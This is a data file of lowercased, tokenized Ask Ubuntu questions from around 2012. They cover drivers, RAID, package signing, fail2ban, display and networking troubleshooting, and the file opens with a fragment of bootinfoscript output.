boot/grub/grub.cfg 1 = boot/initrd.img-3.0.0-19-generic 2 = boot/initrd.img-3.2.0-24-generic 2 = boot/vmlinuz-3.0.0-19-generic 2 = boot/vmlinuz-3.2.0-24-generic 1 = vmlinuz 1 = vmlinuz.old 2 =========================== sdc1/boot/grub/grub.cfg : =========================== if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } ========================= sdc1/syslinux/syslinux.cfg : ========================== # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 # if you would like to use the new menu and be presented with the option to install or run from usb at startup , remove # from the following line . this line was commented out ( by request of many ) to allow the old menu to be presented and to enable booting straight into the live environment ! # ui gfxboot bootlogo =================== sdc1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 0 ================= sdc1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 0 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdc1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in ./bootinfoscript : line 1646 : [ : 2.73495e+09 : integer expression expected
136581	mdadm trying to resync/rebuild array automatically	previously i had setup a ubuntu server using mdadm with 4x 2tb drives . one of my drives died and since this was my backups of my data on different servers i did n't care about losing it . since then , i 've purchased a replacement drive and some new server hardware . i completely reinstalled ubuntu on my ssd , then i deleted the partition table and volumes on all 4 of the 2tb drives . then i went to create a brand new array but when i do , it immediately says degraded and it is trying to resync my new drive with the old array i had setup . how do i just get it to create a new array so i can format the entire array and create a new empty volume ? note : i was doing this in the ubuntu desktop in the unity gui with the disk utility . since then i 've changed over to a full headless server install , but i still want to create this array so it does n't try to resync the replacement disk .
136588	webcam not working and detected in 12.04 , but on 11.10 was working	i had been using ubuntu 11.10 with all the bells and whistles , every thing fine . i download and install the newest version of ubuntu ( 12.04 ) and the webcam does n't work . i tried installing cheese , but this application reports that it does not find any devices . then i found a similar question here , but installing the application gave me the same error : guvcview error : unable to open device please make sure the camera is connected and that the correct driver is installed . i have an hp g60 with integrated webcam that worked perfectly under 11.10 . what should i do ? thx ! /francisco
136592	ubuntu 12.04 strange internal battery capacity error	i recently bought a msi-x370 laptop with ati graphics and wiped windows and replaced with ubuntu 12.04 . now , up until my upgrade from beta 2 to the first stable ubuntu 12.04 release , i did n't have problems with this . this is the problem : acpi knows that my battery capacity is 4400mah , but only randomly charges fully ever . otherwise , it charges to around 86 % , and i get a orange light blinking on the laptop , and my acpi -v says that i 'm charged to 100 % . the strange thing is , that i do a cat info again , and it is still not charged to capacity . why the discrepancy ? did something change in acpi , upower , gnome-power-manager ? i am lost , and no one seems to want to assist . cat info : /proc/acpi/battery/bat1 $ cat ./info present : yes design capacity : 4300 mah last full capacity : 4053 mah battery technology : rechargeable design voltage : 14800 mv design capacity warning : 0 mah design capacity low : 0 mah cycle count : 0 capacity granularity 1 : 1 mah capacity granularity 2 : 1 mah model number : ? model serial number : battery type : lion oem info : ? customer i am standing by for anyone 's ideas thanks
136593	how can i fix broken i915 drivers for intel gpus ?	i 've got troubles getting the i915 drivers to work correctly on my laptop ( hp pavilion dm4 2101ea ) . specifically , the laptop screen goes black and stays black after the splash graphic when booting both from usb key and from harddrive . to get anything on to the display after the splash screen i have to boot either with acpi=off nomodeset i915.modeset=0 i 'd rather not turn acpi off because i like my fans spinning and nomodeset is a bit overkill , so for now i 'm booting with i915.modeset=0 . unfortunately , this turns off kms and my current maximum resolution on the laptop screen is fixed to 1024x768 instead of its real capability . when not setting any of the above boot flags and i plug in an external monitor , the external monitor works fine . when booting with the flags , the external monitor works fine too , but can only do 1024x768 and ca n't do anything else than mirroring the laptop display . i did upgrade the i915 drivers from 2.17 that ship with precise to 2.19 which are the most recent ones but without luck of getting anything to display . here 's my lspci output : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 08:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) here 's lshw -c video *-display unclaimed description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : c0000000-c03fffff memory : b0000000-bfffffff ioport:4000 ( size=64 ) both outputs are generated after booting with i915.modeset=0 . here 's a complete xorg.log file from a boot into a black screen : https : //gist.github.com/479ce06454e47d6123e1 the graphics card is a intel hd 3000 integrated gpu . i 've never had problems with intel hardware on ubuntu before so this is very surprising . if you could provide a method to make i915 work , suggest alternative drivers a way to boot with i915.modeset=0 but higher resolutions and kms on or explain what is happening and how to fix it i 'll give you an answer badge . : ) thanks
136595	how to enable wireless when booting from a cd ?	so , i have finally gotten ubuntu to dual boot on my laptop ( yet only from a cd , which is fine with me right now ) but the wireless does not work . before i actually install this , i need to know that wireless and java applications work . like runescape for example . i do n't want to install a new os on my main computer that i use if it can not run runescape or even simple youtube . when i try to connect to wireless , i 'm missing firmware . where do i get this firmware ?
136598	how to get 640x480 resolution using 12.04 and intel card	i have a computer with an intel card and i am trying to play starcraft . the only resolution i have is 1280x800 and i ca n't get it into 640x480 in order to make the game full screen . any ideas ?
136603	what game engines and game libraries are available for ubuntu ?	what game engines and game libraries are available for ubuntu ? and how to install its latest version
136606	creating a gui from quickly/python and binding with a console app	i want to create a gui for a console application called prozilla ( available in ppas ) . please provide me some links of tutorials which you think , might help me to do it . i like to know how to send commands/parameters and read the progress from the console app . examples are always admired ! thanks a lot !
136607	ubuntu does n't want to use signed deb repository	let 's go . i have a local deb repository . it works fine . but every time when i update my software there is a warning `` you are about to install software that ca n't be authenticated '' . i decided to sign my local repository . my repo structure : /var/www/deb/repo/deb/dists/stable/main/soft_1.0.0-0_amd64.deb /var/www/deb/repo/deb/dists/stable/main/binary-amd64/packages.gz i created a gpg key and imported it on my repo server and on my ubuntu . also i created a release file in each binary-amd64 and binary-i386 . after that i calculated checksums and signed my repository . apt-ftparchive release dists/stable/main/binary-amd64 > > dists/stable/main/binary-amd64/release gpg -abs -o dists/stable/main/binary-amd64/release.gpg dists/stable/main/binary-amd64/release after signing i got new files in my repository /var/www/deb/repo/deb/dists/stable/main/binary-amd64/release /var/www/deb/repo/deb/dists/stable/main/binary-amd64/release.gpg release file : archive : stable suite : stable component : main origin : mysoft label : soft-deb-repo architecture amd64 date : tue , 08 may 2012 14:36:57 utc md5sum : 4fd2fb417d39f3eb7e02c742817e3c35 464 packages.gz f49b96b059c8df343c8903563cfd55f2 109 release sha1 : a2cf6872ae378f9239b5427d06258fb99cd2657f 464 packages.gz c4476d3c036d5373855c2fd7dc61cd7882dd7546 109 release sha256 : 229ffd0eaaf41591827b410fa329c98211fe33cdf658726645f6f25e09edce07 464 packages.gz 5b446e696c9bb94515d97f345bc96a231fa8bc9e9f213e6aa15e4431d2f2e160 109 release and release.gpg : -- -- -begin pgp signature -- -- - version : gnupg v1.4.10 ( gnu/linux ) ijweaaecaayfak+pl5iacgkq7sivqdm0ldiidap/vndczc+y6zbdr3nkubyr5mmz ee1hkklkyumhbbyipgoees5+isaoq83pr7twh3/kcm19z6domydqd2td10ndjxpo cq3qoeezpubwzkuelujhpnl/ljunbjbe5dv8/thpllizt2r5omjct+gvuvwvifmy pa7cs7wllihtne3q/7i= =lurj -- -- -end pgp signature -- -- - but problem wo n't disappear - when i check update by package manager it says that my software ca n't be authenticated . aptitude says warning : untrusted version of the following packages will be installed . what do i do wrong ?
136610	compiz effects not working on an asus 1215b with fglrx	the title says it all . asus 1215b , ubuntu 12.04 64-bit up-to-date and proprietary fglrx drivers activated . i followed some instructions given by an ubuntu user and managed to enable some features ( like woobly windows ) , but compiz effects are still not working . any hints would be greatly appreciated .
136614	monitor shows `` out of range '' message	i 'm using ubuntu 12.04 and everything was fine until today . i 've tried to run a windows game trough wine , the game started but crashed back to the desktop and after that the screen resolution went to very low . i 've got to monitor settings and fixed the resolution to the native 1400x900 and it worked fine until i rebooted my computer . now instead of the greetings screen ( lightdm ) all i get is an black screen with the monitor 's `` out of range '' message . how can i fix this ? i have a radeon hd 5800 . thanks .
136615	dell fx100 kvm host card clobbers onboard audio	i have a dell precision server with a pcie fx100 kvm host card installed ( manufacturer is teradici but it 's rebranded as a dell solution . ) i am not using this card ( it 's installed in the machine but not externally connected to anything ) , but i believe it 's still overriding the onboard audio to be the default and only audio output . as such , the audio from the server is being routed to the kvm card . i do not want this to happen as i have speakers connected to the audio out jack . under system - > preferences - > sound , the only thing listed is `` hda teradici '' , which is the kvm card . according to the server 's manual , the onboard audio is supposed to be `` an integrated two-chip audio solution comprised of sigmatelâs stac9200 high definition audio codec and the esb2âs integrated ac97/high definition digital controller '' . however , it looks like the onboard sound has been disabled by the kvm card . the only entry in /dev/snd/ is pci-0000:02:00.1 , which is the audio interface on the kvm card ( see lspci output below ) . where can i select to use the onboard audio instead of the kvm card ? if that 's not possible , is it possible to disable the pcie kvm card somehow ? this is a remote machine so i 'm not able to physically remove the card . i would also appreciate any troubleshooting steps to point me in the right direction for where this card may be overriding things , any relevant logs , etc . lspci output lspci lists the following for the device : 02:00.0 usb controller : teradici corp. device 1200 02:00.1 audio device : teradici corp. device 1200 lshw output and lshw has the following relevant section : *-pci:1 description : pci bridge product : 5400 chipset pci express port 5 vendor : intel corporation physical id : 5 bus info : pci @ 0000:00:05.0 version : 20 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress bus_master cap_list configuration : driver=pcieport resources : irq:73 memory : dbf00000-dbffffff *-usb description : usb controller product : teradici corp. ... configuration : driver=ohci_hcd latency=0 resources : irq:52 memory : dbffb000-dbffbfff *-multimedia description : audio device product : teradici corp. vendor : teradici corp. physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:52 memory : dbffc000-dbffffff pacmd list-cards output and pacmd list-cards lists only one card available ( which is why i 'd assume i 'm unable to select any others ) : welcome to pulseaudio ! use `` help '' for usage information . > > > 1 card ( s ) available . index : 0 name : < alsa_card.pci-0000_02_00.1 > driver : < module-alsa-card.c > owner module : 4 properties : alsa.card = `` 0 '' alsa.card_name = `` hda teradici '' alsa.long_card_name = `` hda teradici at 0xdbffc000 irq 52 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:02:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:05.0/0000:02:00.1/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 6549 '' device.vendor.name = `` teradici corp. '' device.product.id = `` 1200 '' device.string = `` 0 '' device.description = `` hda teradici '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profiles : output : analog-stereo : analog stereo output ( priority 6000 ) output : analog-stereo+input : analog-stereo : analog stereo duplex ( priority 6060 ) input : analog-stereo : analog stereo input ( priority 60 ) off : off ( priority 0 ) active profile : < output : analog-stereo > sinks : alsa_output.pci-0000_02_00.1.analog-stereo/ # 0 : hda teradici analog stereo sources : alsa_output.pci-0000_02_00.1.analog-stereo.monitor/ # 0 : monitor of hda teradici analog stereo > > > aplay output and aplay -l similarly only lists the teradici device : **** list of playback hardware devices **** card 0 : teradici [ hda teradici ] , device 0 : alc883 analog [ alc883 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0
136616	is one node + maas possible ?	presently i have two machines wanting to join a private cloud an hp i386 & dell amd64 . installing the maas in the dell and attempting to add the hp as a node yields unable to create node : unknown problem encountered with the cobbler server like : maas enlistment through 12.04 installation cd fails installing the maas in the hp and attempting to add the dell as a node yields : nodes have a status of `` commissioning '' like : https : //wiki.ubuntu.com/serverteam/maas/troubleshooting . do i need to install and configure other servers to the maas before attempting to add nodes ? kinda like what maxmid was hinting at in : architecture diagram explaining the ubuntu cloud infrastructure with maas / openstack architecture ? with comment : maybe a first step would be to list what is the role of each 10 machines of the ubuntu cloud infrastructure deployment with maas and juju : maas server juju bootstrap node ( juju uses it to coordinate the services being deployed ) mysql openstack 's rabbitmq openstack 's keystone openstack 's nova-cloud-controller openstack 's nova-volume openstack 's nova-compute openstack 's glance openstack 's openstack-dashboard
136619	how to disable gnome fallback animations ?	opening an application from the panel starts with fade in and ends with a black square in compiz mode . in 2d-mode launcher on panel starts with border at the edges of the screen , which appears on the second . how to disable it ?
136622	how do i change some of the default shortcuts ?	i 'm from windows background and i find it more easy to use win key + d to get my desktop . but in ubuntu 12.04 it is ctrl + win key + d. i wish to change this . how could i do this ?
136624	need help upgrading from 10.04 to 12.04	i have ubuntu 10.04 and want to upgrade to the next lts version = 12.04 . is it best to upgrade thru successive versions ie . 10.10 , 11.04 , 11.10 , then 12.04 or straight to 12.04 . when i go to upgrade it does not give me the option to go to 12.04 even with lts versions selected . so , to upgrade directly to 12.04 do i have to do a `` new '' install from a cd ( which i have ) ? can not find an answer to this question on the help sites . thanks for any help .
136627	how do i change the desktop cube into a sphere or cylinder ?	i have the desktop cube enabled and everything , and i 've watched several tutorials on it . but when i go to the cube settings in compiz i do n't have the option to make it a sphere or cylinder . is there something additional i need to install in order to make that work or what ?
136630	password issues	i was having password issues , my authentication would n't work and i could n't use sudo or log into root ( i probably messed up the usage of the passwd command ) now i have reset the password via the shadow file for both root and my main account but my authentication isnt working and i 'm hesitant to use passwd again . any advice for fixing this so i can authenticate privileges again ? notes : i have log in without password enabled which i would like to disable but cant find a way i 'm using ubuntu desktop 12.04 lts any other information needed just post here
136636	facebook access problem , on ubuntu only	i have a problem to open any facebook page , it is wierd because on the same computer on windows 7 i can open facebook and on other devices connected to the same network . but if i connect my computer to internet via my phone ( as a 3g modem ) facebook works . i tried firefox , chrome , chormium , private mode , clearing facebook cookies in which i could open facebook as normal , but for 1 minute only . edit* i think i found the reason , few days ago i have installed openssh-server ( for ubuntu remote app for android ) and from that time i had this problem , i removed it and facebook works : )
136638	why does the kernel not get updated when using a persistant live usb ?	i have created a live usb of ubuntu 12.04 with a 4gb persistence file . firefox and other software get updated when running update manager . however , the linux kernel will not update and i am unable to install synaptic package manager , ubuntu tweak , etc . is there a fix for this . thanks in advance .
136640	how do i set my own pictures to change on my desktop ? ( like every few minutes or so ? )	okay , so , i would like to have my background change without me having to do so . sounds so weird to say that , but , i 've updated to 12.04 , and i 've searched the topic- but the only things i 've come across is `` how do i stop my desktop pictures from changing ? '' and `` why do they change '' . i only found one post almost directly related but i had my brain melt on me in confusion . i am an absolute beginner- and i 've been trying to learn more- but i get so confused . i saw you could set it like that and i only have one- but i want it to be my pictures . ( and i 've had no luck looking for how to do that myself. ) . so , could someone please tell me ( step by step , the whys for the steps- i am a baby at this , like i said . ) , how to have my background change every few minutes , hours- every time i log on ( just change ! ) ... . but have them be my pictures . i 'd very much appreciate the help ! thank you !
136643	how do i fill the current selection with color ?	i remember there 's some option allow you to fill current selection with colors , but i could n't find it anymore
136644	can squid be used to cache updates for other distros ?	specifically , if i have a small virtual lan with multiple vms of each different distro - say three centos vms , two debian vms , and assorted ubuntu vms - can squid safely cache the updates for each with out interfering with one another ? i 'm aware of squid-deb-proxy for ubuntu , but i 'm looking for something a little more general purpose - i think .
136646	how to revert to original gnome shell theme	i 'm on 12.04 and it seems my gnome shell theme went corrupted in its .js and .css files . how to reveert to the original and default theme ? is there a place where it can be downloaded or maybe it 's enough to purge and reinstall certain packages ?
136649	how can i make sure my server is connecting through my router ?	i have a ubuntu server with php , apache2 and all of that setup and working on my lan . meaning from any computer connected to the same router i can connect to 10.0.0.3 ( my server ) . i have setup my router to forward requests at port 80 to 10.0.0.3 but when i try to connect to my ( router ) ip address 69.244.36.144 i get a `` connection was reset '' error . any clues to what i am doing wrong ?
136654	sound indicator + control disappeared in shell	the sound indicator in the gnome shell panel sometimes disappears , i did n't notice any action from my side that may have triggered it . when i open the sound settings manually , i ca n't adjust anything either , however , the sound in general still works fine . restarting x brings things back to normal . any idea how i can regain control over the sound settings short of restarting the entire system ? i 'm running 11.10 with gnome-shell 3.2 . somebody asked the same question a couple of days ago , which was closed for being `` too localized '' . i 'm obviously not the only one affected so i can only guess that gnome-shell is too niche here . if so , please just close this one as well . update : i just found that all details of my problem match the bug described in this question . can somebody please mark my question a duplicate ? thanks a lot .
136655	`` kde-config not found '' error while installing kstars from source	i am trying to install kstars from source , but i got the following error while configuring ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking for -p flag to install ... yes checking whether build environment is sane ... yes checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for kde-config ... not found configure : error : the important program kde-config was not found ! please check whether you installed kde correctly . what does it mean , i already installed kde in my computer
136656	why does my wireless connection on a thinkpad t400 drop approximately every two minutes ?	i have a fresh install of ubuntu 12.04 on my thinkpad t400 . everything works fine except wireless connection . the problem with wireless connection is that my internet stops working ever 2-3mins ( even though i still seems be connected with my wireless connection ) . my internet starts automatically after 2-3mins based on some of the suggestion on similar problems i have done following already 1 ) set ipv6 to ignore 2 ) power management was set to off but no luck with above two steps ... any help would be highly appreciated .
136660	how to shutdown a linux machine , including the root password , in 1 line ?	how do you include the root password , say for shutting down an ubuntu machine ? like , sudo shutdown now is it possible to include the password on this 1 line ? like an extra parameter ? reason for this is i am trying to play with this app named azr remote prompt which lets you send commands from your blackberry to your ubuntu machine and it seems like a 1 way trip . you send commands , but you do n't get any response from the computer .
136669	how to install backported programms ?	how to get backported kernel and nautilus ? im on 10.04 i want fixes witch are made in 12.04 how to get them ? im beeing told about installing backported kernel . on 10.04 i have some bugs witch been fixed with latest kernel and latests nautilus
136670	update failed because of gpg errors	i tried to update via terminal by using the command sudo apt-get update & & sudo apt-get upgrade and the following error pops up w : gpg error : http : //archive.canonical.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 2ea8f35793d8809a w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 175b884292c4befd launchpad ppa for gnome split w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 3bdaac08614c4b38 launchpad otto06217 w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 8cd60ec948894010 launchpad ppa for scopes packagers w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 464ad83d4631bbea launchpad equinoxart w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 6af0e1940624a220 launchpad ppa for tualatrix w : gpg error : http : //archive.getdeb.net precise-getdeb release : the following signatures were invalid : badsig a8a515f046d7e7cf getdeb archive automatic signing key < archive @ getdeb.net > reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how to prevent the following errors ? i am running ubuntu 12.04 .
136671	how to login into a ubuntu machine from windows	we have windows vista/xp machines connected to a win 2k3 server in our lan environment . we recently got few laptops configured w/ubuntu 11 and we would like to enable our windows users to remote login into these ubuntu machines ( e.g . with their own user id ( s ) ) so that they can work on them . what should i do to achieve this ? note : we do n't want to use anything like teamviewer or vncviewer ... , we just need terminal access to these machines so that we can compile/run programs .
136673	fail2ban broken after dist upgrade	my fail2ban install is broken after a dist update . i have no idea why it stopped to work . the logfile is over weeks 0 byte . even if i can see in my server logs that the client should be blocked . here is my jail.conf ( comments removed ) : [ default ] ignoreip = 127.0.0.1 bantime = 600 maxretry = 3 backend = polling destemail = root @ localhost banaction = iptables-multiport mta = sendmail protocol = tcp action_ = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] action_mw = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] % ( mta ) s-whois [ name= % ( __name__ ) s , dest= '' % ( destemail ) s '' , protocol= '' % ( protocol ) s ] action_mwl = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] % ( mta ) s-whois-lines [ name= % ( __name__ ) s , dest= '' % ( destemail ) s '' , logpath= % ( logpath ) s ] action = % ( action_ ) s [ ssh ] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 6 # ... [ ispconfig-w00tw00t ] enabled = true filter = ispconfig-w00tw00t action = iptables-complete [ name=ispconfig-w00tw00t ] logpath = /var/log/apache*/*access.log maxretry = 1 bantime = 86400 [ block-phpmyadmin ] enabled = true filter = block-phpmyadmin action = iptables-complete [ name=block-phpmyadmin ] logpath = /var/log/apache*/*access.log maxretry = 1 bantime = 86400 and here comes my own two rules ispconfig-w00tw00t.conf : [ definition ] failregex = ^ < host > - . * '' get \/w00tw00t\.at.* '' . * ignoreregex = any my block-phpmyadmin : [ definition ] failregex = ^ < host > - . * '' get .*php [ mm ] y [ aa ] dmin.* '' . * ignoreregex = i hacked a little the init.d script and got this error messages : warning 'findtime ' not defined in 'apache-noscript ' . using default value warning 'findtime ' not defined in 'pam-generic ' . using default value warning 'findtime ' not defined in 'vsftpd ' . using default value warning 'findtime ' not defined in 'xinetd-fail ' . using default value warning 'findtime ' not defined in 'block-phpmyadmin ' . using default value warning 'findtime ' not defined in 'ispconfig-w00tw00t ' . using default value warning 'findtime ' not defined in 'ssh-ddos ' . using default value warning 'findtime ' not defined in 'apache-multiport ' . using default value warning 'findtime ' not defined in 'apache-overflows ' . using default value warning 'findtime ' not defined in 'couriersmtp ' . using default value warning 'findtime ' not defined in 'wuftpd ' . using default value warning 'findtime ' not defined in 'ssh ' . using default value error /etc/fail2ban/action.d/iptables-multiport.conf and /etc/fail2ban/action.d/iptables-multiport.local do not exist error error in action definition iptables-multiport [ name=ssh , port= '' ssh '' , protocol= '' tcp ] error errors in jail 'ssh ' . skipping ... and the deamon does not start . not sure why .
136674	how to access hdd folder when booting from usb ? ( permission denied )	so , as described in a different question , my regular ubuntu installation is broken at the moment , and i 'm booting from a usb . naturally i 'd like to make sure everything is backed up , but for some reason i can not access one of the folders on the hdd . i can open most , but this one in particular says : the folder contents could not be displayed you do not have the permissions necessary to to view contents of `` lifnetworks '' . what now ? is there a way to `` root '' my way around this ? , or does this mean that my computer is more broken than i thought ? i do n't have any good reason why that folder should have different permissions than the others . it 's really the only important one , so it 's quite a problem . i hope the question makes sense : ) edit : going with achu 's suggestion , i get the following : sudo nautilus initializing nautilus-gdu extension nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ( nautilus:5836 ) : glib-gio-warning ** : missing callback called fullpath = /root/.config/user-dirs.dirs on screen , i got a dialog saying that it could n't create a file ( sorry , i did n't copy the text ) . when i redo the command , i do n't get the dialog , but the nautilus-window which opens does n't see the devices , which includes the file system of the broken ubuntu installation . opening nautilus from the sidebar , the devices are still there .
136677	can i just install ubuntu on a hp dv2000 and everything will work ?	i would love to start using ubuntu and ubuntu only . i have a hp dv2000 , that i was hoping could run the latest version . can i just download ubuntu , burn iso and install it as my main os and everything will work 'out of the box ' or will i need to work on it ?
136680	how to rename the desktop folder without breaking my system ?	i 'm currently using ubuntu 11.10 in german . i noticed , that the desktop folder 's name is `` arbeitsfl채che '' . unfortunately i am used to `` cd desktop '' instead of `` cd arbeitsfl채che '' . is it possible to rename my arbeitsfl채che to desktop without breaking my system ?
136687	where can i find checksums to verify the download of 12.04 alternate amd 64	i would like to verify the ubuntu alternate install cd image i 've downloaded via torrent . where can i find the md5 checksums on the ubuntu home page ? are they available via the site menu ?
136688	lamp server : can not view the created website	i 'm new to linux , and only use it for surfing web until recently . for everyone to know , i had developed a website complete with its database using wampserver on windows . and i created the all the pages using adobe dreamweaver . the site had been working perfectly . recently , i installed ubuntu 12.04 on my machine ( dual boot with the prior windows ) together with lamp server , and i was intending to transfer my whole website pages and databases to the ubuntu platform . the lamp server seems to be working fine . after that i copied all the .php website files from wampserver to lamp in the directory /var/www but when i tried to view the page through mozilla browser , it only showed blank white page , although the url showed the correct address . why was this happen ? did i do anything wrong during lamp installation ? the site was designed with css style , would this contribute to the problem ?
136689	how can i see a history of the terminal output , not just commands entered ?	i 'm trying to do some debugging in android and i am running a live logcat in the terminal , but the problem is that there is too much information generated so that when i am finished and try to copy all the information received by choosing `` select all '' and then `` copy '' a lot of the early output which is produced is n't copied . i was aware of history , but that just provides a list of commands that have previously been entered , not the output . can i see a history of all the output that the terminal gives , or perhaps can i have the terminal save as a text file all the output that it is producing ?
136690	errors followed by command `` sudo nautilus ''	i have opened nautilus with root power to delete some items.when i typed sudo nautilus , the particular window opened up , but some errors also came along with it as following : meego @ meego-notebook-pc : ~ $ sudo nautilus [ sudo ] password for meego : initializing nautilus-gdu extension ** ( nautilus:5579 ) : warning ** : failed to get the current ck session : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '5579' ( nautilus:5579 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** ( nautilus:5579 ) : warning ** : could not inhibit power management : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : name `` org.gnome.sessionmanager '' does not exist ** ( nautilus:5579 ) : warning ** : could not inhibit power management : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : name `` org.gnome.sessionmanager '' does not exist what all these means ?
136698	proxy is locked with an account	at my school is a proxy with accounts . i got it to go in the internet with firefox , but i do n't have access with the update and the software center . so what can i do ?
136699	gigabyte geforce gtx 560 issues	i was unable to install ubuntu via the graphical method . so i used the alternative text-based installation . i am able to boot into ubuntu now , but the display is squashed , pixelated and unreadable . how can i get around this ? , would installing the nvidia drivers fix this ? and how would i install them with the display in this state ?
136702	unable to upgrade from 11.10 to 12.04 ?	i can not find reference to the new release ( 12.04 ) in the update manager ( it was there , now no longer ) , while mark @ athene : ~ $ sudo do-release-upgrade checking for a new ubuntu release no new release found although i am running 11.10 .
136709	printer driver - ps , pcl , pxl , which one to choose ?	at work we have a canon c5045i printer , for which canon provides three ppd files : ps , pcl , and pxl . is there any one that is preferable over the others ? is there any difference between the three ?
136713	uploading an html5 app to the software center	i have an app written in html and javascript , suitable for distribution in the chrome web store as a packaged app . ( you can even package it up as a single html file with data : uris . ) is it possible for me to submit an app like this to the ubuntu software center ? if so , how ?
